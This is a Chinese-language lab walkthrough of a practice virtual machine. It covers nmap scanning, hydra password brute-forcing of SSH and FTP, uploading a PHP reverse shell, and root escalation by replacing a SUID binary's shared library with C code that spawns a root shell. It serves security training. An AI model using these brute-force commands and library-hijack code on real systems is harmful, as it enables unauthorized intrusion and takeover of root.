所渗透的靶机IP为192.168.56.113

端口扫描

sudo nmap --min-rate 10000 -p- 192.168.56.113      
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-15 03:38 UTC
Nmap scan report for 192.168.56.113 (192.168.56.113)
Host is up (0.00012s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:5E:81:8A (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 2.94 seconds
sudo nmap -sT -sV -sC -O -p21,22,80 192.168.56.113  
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-15 03:39 UTC
Nmap scan report for 192.168.56.113 (192.168.56.113)
Host is up (0.00029s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr--    2 1001     33           4096 Oct 19  2020 html
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.56.102
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 09:0e:11:1f:72:0e:6c:10:18:55:1a:73:a5:4b:e5:64 (RSA)
|   256 c0:9f:66:34:56:1d:16:4a:32:ad:25:0c:8b:a0:1b:5a (ECDSA)
|_  256 4c:95:57:f4:38:a3:ce:ae:f0:e2:a6:d9:71:42:07:c5 (ED25519)
80/tcp open  http    nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:5E:81:8A (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.34 seconds

FTP

可以匿名登录,有一个html目录但是不知道为何无法切换目录。似乎是没有权限?

Getshell

只有一个根目录,然后得到两个用户名,试着爆破alan用户的ssh密码

hydra -l alan -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.113

但是失败了

想到之前的FTP,试着爆破FTP

hydra -l eleanor -P /usr/share/wordlists/rockyou.txt ftp://192.168.56.113

得到密码:ladybug

再次登录FTP

现在可以成功进入html目录,虽然没有其他东西,试着可以上传一个PHP反弹shell,但还是没有权限。

后来发现换用SFTP客户端就可以上传了,之前用FTP却不可以。然后就反弹shell

之后可以用eleanor用户的FTP密码来切换至这个用户

可以进入alan用户的目录,虽然没有权限看note.txt,但是有一个random可执行文件。并且具有SUID位。

提权

除此之外还有一个.o和.h后缀的文件。IDA反编译一下,random大致是如果用户输入的数字和生成的随机数(1-9)相同那么执行makeroot函数,也许是可以成为root?

在盲试了几个数之后大概是相同了,但是返回了

SUCCESS!! But I need to finish and implement this function

这个函数还没有完成?rooter.o的内容就是输出这串字符串了。看来漏洞并不在此

ldd random
ldd random
        linux-vdso.so.1 (0x00007ffe785e5000)
        librooter.so => /lib/librooter.so (0x00007fe8bd4d0000)
        libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fe8bd30f000)
        /lib64/ld-linux-x86-64.so.2 (0x00007fe8bd4e1000)

似乎是链接了/lib/librooter.so这个共享库,原来makeroot函数在这里

可以试着更改这个共享库,写一个rooter.c

#include <stdlib.h>

void makemeroot()
{
	setuid(0);
	setgid(0);
	system("/bin/bash");
}
gcc -shared rooter.c -o /lib/librooter.so

将其编译成共享库

继续执行random,一个数多试几次然后我们是root!

碎碎念

前面的部分都很简单,后面需要一些C语言基础,也算了解了一些